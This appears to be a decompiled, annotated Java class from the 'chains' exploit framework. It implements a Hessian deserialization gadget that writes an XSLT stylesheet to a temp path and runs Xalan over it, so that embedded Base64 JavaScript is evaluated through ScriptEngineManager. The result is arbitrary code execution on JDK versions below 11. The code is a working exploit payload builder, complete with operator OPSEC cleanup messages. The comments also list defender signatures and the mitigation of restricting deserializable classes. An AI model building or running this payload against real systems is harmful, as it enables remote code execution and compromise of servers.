package com.ar3h.chains.gadget.impl.hessian.jdk;

import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import com.ar3h.chains.common.enums.Authors;
import com.ar3h.chains.common.exception.ThrowsUtil;
import com.ar3h.chains.common.param.Choice;
import com.ar3h.chains.common.param.Param;
import com.ar3h.chains.common.param.ParamType;
import com.ar3h.chains.common.util.PayloadHelper;
import java.util.LinkedList;
import javax.swing.UIDefaults;
import org.apache.commons.codec.binary.Base64;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import sun.swing.SwingLazyValue;

/**
 * Gadget that turns a JS expression (the {@code Js_Expr} the next chain element produces, per
 * {@code @GadgetTags(nextTags = ...)}) into a Hessian-deserialization payload: a list of two
 * {@link SwingLazyValue} instances, each wrapped by {@link #getMap}, that (1) write an XSLT
 * stylesheet to disk and (2) run the internal Xalan {@code Process._main} over it. The stylesheet
 * ({@link #xsltTemplate}) Base64-decodes the embedded script and evaluates it through
 * {@code javax.script.ScriptEngineManager}.
 *
 * <p>Defender notes grounded in this file: the serialized stream names
 * {@code com.sun.org.apache.xml.internal.security.utils.JavaUtils#writeBytesToFilename} and
 * {@code com.sun.org.apache.xalan.internal.xslt.Process#_main} as {@link SwingLazyValue} targets,
 * which are usable detection signatures at the deserialization boundary; execution leaves two
 * files on the target (the stylesheet path and the same path with {@code .class} appended, as the
 * OPSEC log lines in {@link #getObject} state), defaulting to {@code /tmp/_tomcat_data_temp} or
 * {@code C:\Windows\Temp\_tomcat_data_temp}; the {@code dependencies = {"jdk<11"}} declaration is
 * consistent with the template's reliance on {@code javax.xml.bind.DatatypeConverter}, which is
 * not part of JDK 11+. Restricting the classes Hessian is allowed to deserialize removes the
 * entry point for the whole chain.
 *
 * <p>Not thread-safe: {@link #context} is per-invocation state kept on the instance.
 */
@GadgetAnnotation(name = "Xslt整合链2 一键通过js实现代码执行", description = "使用JavaUtils写xml文件，之后再调用Process函数解析进行任意代码执行，使用JS表达式来执行\n不同于Xslt1链，本链使用Js来执行，不依赖Spring环境\n注意执行后会在指定目录下残留两个文件\n此链可重复执行，会覆盖之前的Payload文件", dependencies = {"jdk<11"}, authors = {Authors.cop233, Authors.Ar3h}, priority = 40)
@GadgetTags(tags = {Tag.HessianDeserialize}, nextTags = {Tag.Js_Expr})
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/gadget/impl/hessian/jdk/XsltOnlyJdk.class */
public class XsltOnlyJdk implements Gadget {
    /** SLF4J logger; the OPSEC warnings about the residual files are emitted here as well as to {@link #context}. */
    private static final Logger log = LoggerFactory.getLogger((Class<?>) XsltOnlyJdk.class);

    /** Target OS selector; {@link #getObject} accepts only "linux" and "windows" (case-insensitive). */
    @Param(name = "目标操作系统", description = "可选 {linux, windows}，默认对应路径如下：\nlinux: /tmp/_tomcat_data_temp\nwindows: C:\\Windows\\Temp\\_tomcat_data_temp", type = ParamType.Choice, choices = {@Choice("linux"), @Choice("windows")})
    public String os = "linux";

    /** Optional absolute path override; when non-null and non-empty it replaces the OS default in {@link #getObject}. */
    @Param(name = "创建目标文件的绝对路径", description = "创建xml文件，测试发现使用相对路径存在问题，建议使用绝对路径", requires = false)
    public String path;
    /** Neither read nor written anywhere in this class; presumably populated by the framework — confirm against the caller. */
    public String className;
    /** Set by {@link #invoke}; {@link #getObject} dereferences it unconditionally, so calling getObject() directly throws NPE. */
    GadgetContext context;
    /**
     * XSLT stylesheet with a single {@code %s} slot that receives the Base64 form of the script.
     * The Xalan extension namespaces bind {@code String}, {@code DatatypeConverter},
     * {@code ScriptEngineManager} and {@code ScriptEngine}; the template decodes the script,
     * obtains the "js" engine and calls {@code eval} on it, then emits the result.
     */
    static final String xsltTemplate = "<xsl:stylesheet version=\"1.0\" xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\"\nxmlns:ob=\"http://xml.apache.org/xalan/java/java.lang.Object\" \nxmlns:clazz=\"http://xml.apache.org/xalan/java/java.lang.Class\" \nxmlns:base=\"http://xml.apache.org/xalan/java/javax.xml.bind.DatatypeConverter\"\nxmlns:stringclazz=\"http://xml.apache.org/xalan/java/java.lang.String\"\nxmlns:jsclazz=\"http://xml.apache.org/xalan/java/javax.script.ScriptEngineManager\"\nxmlns:jseclazz=\"http://xml.apache.org/xalan/java/javax.script.ScriptEngine\"\n>\n<xsl:template match=\"/\">\n     <xsl:variable name=\"payload\" select=\"stringclazz:new(base:parseBase64Binary('%s'))\"/>\n      <xsl:variable name=\"jsobj\" select=\"jsclazz:new()\"/>\n     <xsl:variable name=\"jso\" select=\"jsclazz:getEngineByName($jsobj,'js')\"/>\n     <xsl:variable name=\"jse\" select=\"jseclazz:eval($jso,$payload)\"/>\n     <xsl:value-of select=\"$jse\"/>\n\n    </xsl:template>\n  </xsl:stylesheet>";

    /**
     * Builds the two-step payload list for the given script.
     *
     * @param str the JS source to embed; it is converted with {@code str.getBytes()} (platform
     *            default charset, no explicit {@code StandardCharsets.UTF_8}) and Base64-encoded
     *            before being formatted into {@link #xsltTemplate}
     * @return a raw {@link LinkedList} holding, in order, the file-write map and the
     *         XSLT-process map produced by {@link #getMap}
     * @throws Exception whatever {@link ThrowsUtil#throwGadgetException} raises for an unsupported
     *                   {@link #os}, or whatever {@link #getMap} propagates
     */
    public Object getObject(String str) throws Exception {
        String str2 = null;
        // Default drop location per OS; the error branch assumes throwGadgetException does not
        // return normally — if it does, str2 stays null when no path override is set (confirm).
        if ("linux".equalsIgnoreCase(this.os)) {
            str2 = "/tmp/_tomcat_data_temp";
        } else if ("windows".equalsIgnoreCase(this.os)) {
            str2 = "C:\\Windows\\Temp\\_tomcat_data_temp";
        } else {
            ThrowsUtil.throwGadgetException("Unsupported os: " + this.os);
        }
        // Explicit path wins over the OS default.
        if (this.path != null && !this.path.isEmpty()) {
            str2 = this.path;
        }
        // Two artefacts are left on the target: the stylesheet itself and a ".class" sibling.
        // Reported both to the local logger and to the chain context (NPE if invoke() never ran).
        String str3 = "[OPSEC] you need to clean the target file: " + str2;
        String str4 = "[OPSEC] you need to clean the target file: " + str2 + ".class";
        log.warn(str3);
        log.warn(str4);
        this.context.log(str3);
        this.context.log(str4);
        // Step 1: JavaUtils.writeBytesToFilename(str2, bytes) writes the filled-in template to str2.
        SwingLazyValue swingLazyValue = new SwingLazyValue("com.sun.org.apache.xml.internal.security.utils.JavaUtils", "writeBytesToFilename", new Object[]{str2, String.format(xsltTemplate, Base64.encodeBase64String(str.getBytes())).getBytes()});
        // Step 2: Process._main(String[]) is pointed at the file just written. Note "file://" is
        // prefixed verbatim, so a Windows path becomes "file://C:\..." — whether Xalan resolves that
        // form is not verifiable from this file.
        SwingLazyValue swingLazyValue2 = new SwingLazyValue("com.sun.org.apache.xalan.internal.xslt.Process", "_main", new Object[]{new String[]{"-XT", "-XSL", "file://" + str2}});
        // Raw LinkedList (no type argument); order matters: write first, then process.
        LinkedList linkedList = new LinkedList();
        linkedList.add(getMap(swingLazyValue));
        linkedList.add(getMap(swingLazyValue2));
        return linkedList;
    }

    /**
     * Stores the same lazy value under the key {@code "gadget-chains"} in two fresh
     * {@link UIDefaults} tables and hands the pair to {@link PayloadHelper#makeMap}. The
     * structure makeMap builds from the two tables is defined by that helper and is not visible
     * here — confirm against PayloadHelper before relying on its shape.
     *
     * @param swingLazyValue the lazy value to place in both tables
     * @return whatever {@link PayloadHelper#makeMap} returns for the two tables
     * @throws Exception propagated from {@link PayloadHelper#makeMap}
     */
    public Object getMap(SwingLazyValue swingLazyValue) throws Exception {
        UIDefaults uIDefaults = new UIDefaults();
        UIDefaults uIDefaults2 = new UIDefaults();
        uIDefaults.put("gadget-chains", swingLazyValue);
        uIDefaults2.put("gadget-chains", swingLazyValue);
        return PayloadHelper.makeMap(uIDefaults, uIDefaults2);
    }

    /**
     * {@link Gadget} entry point: records the context (used for logging in {@link #getObject})
     * and builds the payload from the next link's output.
     *
     * @param gadgetContext per-invocation context, kept in {@link #context}
     * @param gadgetChain the downstream chain; its {@code doCreate} result is cast to String
     * @return the list produced by {@link #getObject}
     * @throws ClassCastException if {@code gadgetChain.doCreate} yields something other than a String
     * @throws Exception propagated from {@code doCreate} or {@link #getObject}
     */
    @Override // com.ar3h.chains.common.Gadget
    public Object invoke(GadgetContext gadgetContext, GadgetChain gadgetChain) throws Exception {
        this.context = gadgetContext;
        return getObject((String) gadgetChain.doCreate(gadgetContext));
    }
}
